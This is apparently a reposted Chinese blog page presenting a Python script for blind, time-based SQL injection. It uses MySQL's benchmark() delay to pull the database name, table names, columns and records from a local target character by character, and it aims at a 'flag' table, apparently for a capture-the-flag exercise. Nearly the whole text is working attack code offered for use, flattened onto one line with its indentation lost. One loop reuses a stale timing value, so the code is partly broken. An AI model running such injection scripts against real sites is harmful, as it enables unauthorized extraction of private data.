sql注入------基於時間延遲benchmark函式注入指令碼
阿新 • • 發佈:2018-11-28
import requests urlx = 'http://127.0.0.1/?id= 1 and if((substr((select database()),' payloads = 'qwertyuiopasdfghjklzxcvbnm{}_0123456789' def guess_column(table): string = '' extend = 0 list = [] length2 = 0 num = [] num1 = [] url1 = 'http://127.0.0.1/?id= 1 and if(((select count(column_name) from information_schema.columns where table_name=\''+ table + '\')=' url2 = 'http://127.0.0.1/?id= 1 and if((substr((select column_name from information_schema.columns where table_name=\'' + table + '\' limit ' url3 = 'http://127.0.0.1/?id= 1 and if(((select length(column_name) from information_schema.columns where table_name=\'' + table + '\' limit 'url4 = 'http://127.0.0.1/?id= 1 and if(((substr((select ' url5 = 'http://127.0.0.1/?id= 1 and if(((select count(' url7 = 'http://127.0.0.1/?id= 1 and if(((select length(' for i in range(50): #獲取欄位數量 url = url1 + str(i) + '),benchmark(1000000,md5(\'test\')),NULL); %23' r = requests.get(url) print(url) time = r.elapsed.total_seconds() print(time) if time > 1.5: extend = i length2 = i break for k in range(extend): st = '' extend1 = 0 for m in range(100): url = url3 + str(k) + ',1)=' + str(m) + '),benchmark(1000000,md5(\'test\')),NULL); %23' #獲取欄位長度 r = requests.get(url) if time > 1.5: extend1 = m break for i in range(1,extend1+1): #獲取欄位 for payload in payloads: url = url2 + str(k) + ',1),' + str(i) + ',1)=\'' + payload + '\'),benchmark(1000000,md5(\'test\')),NULL); %23' r = requests.get(url) time = r.elapsed.total_seconds() if time > 1.5: print(url) st += payload break list.append(st) num1.append(st) length = 0 for i in range(1,10000): #獲取記錄數量 url = url5 + str(num1[0]) + ') from ' + table + ')=' + str(i) + '),benchmark(1000000,md5(\'test\')),NULL); %23' print(url) r = requests.get(url) time = r.elapsed.total_seconds() if time > 1.5: length = i break for column in list: str1 = '' for i in range(length): length1 = 0 url6 = url4 + str(column) + ' from ' + table + ' limit ' + str(i) for k in range(100): #獲取記錄長度 url = url7 + str(column) + ') from '+ table + ' limit ' + str(i) + ',1)=' + str(k) + '),benchmark(1000000,md5(\'test\')),NULL); %23' r = requests.get(url) time = r.elapsed.total_seconds() if time > 1.5: print(url) length1 = k break for n in range(1,length1+1): #獲取記錄 for payload in payloads: url = url6 + ',1),' + str(n) + ',1))=\'' + str(payload) + '\'),benchmark(1000000,md5(\'test\')),NULL); %23' r = requests.get(url) time = r.elapsed.total_seconds() if time > 1.5: print(url) str1 += payload break num.append(str1) str1 = '' for column in num1: print(column+' ',end='') print('\n',end='') for i in range(length2): for k in range(length): x = i + length * k print(num[x]+' ',end='') print('\n',end='') def guess_table(): string = '' extend = 0 list = [] url1 = 'http://127.0.0.1/?id= 1 and if(((select count(table_name) from information_schema.tables where table_schema=database())=' url2 = 'http://127.0.0.1/?id= 1 and if((substr((select table_name from information_schema.tables where table_schema=database() limit ' url3 = 'http://127.0.0.1/?id= 1 and if(((select length(table_name) from information_schema.tables where table_schema=database() limit ' for i in range(50): url = url1 + str(i) + '),benchmark(1000000,md5(\'test\')),NULL); %23' r = requests.get(url) time = r.elapsed.total_seconds() if time > 1.5: extend = i break for k in range(extend): st = '' extend1 = 0 for m in range(100): url = url3 + str(k) + ',1)=' + str(m) + '),benchmark(1000000,md5(\'test\')),NULL); %23' r = requests.get(url) time = r.elapsed.total_seconds() if time > 1.5: extend1 = m break for i in range(1,extend1+1): for payload in payloads: url = url2 + str(k) + ',1),' + str(i) + ',1)=\'' + payload + '\'),benchmark(1000000,md5(\'test\')),NULL); %23' r = requests.get(url) time = r.elapsed.total_seconds() if time > 1.5: st += payload break list.append(st) print('------------') for i in list: print(f'[*]{i}') print('------------') guess_column('flag') def main(): string = '' url1 = 'http://127.0.0.1/?id= 1 and if((length(database())=' extend = 0 for k in range(20): url = url1 + str(k) + '),benchmark(1000000,md5(\'test\')),NULL); %23' r = requests.get(url) time = r.elapsed.total_seconds() if time > 1.5: extend = k break for i in range(1,extend+1): for payload in payloads: url = urlx + str(i) + ',1)=\'' url = url + payload + '\'),benchmark(1000000,md5(\'test\')),NULL); %23' r = requests.get(url) time = r.elapsed.total_seconds() if time > 1.5: string += payload break print(f'available database\n[*] {string}') guess_table() main()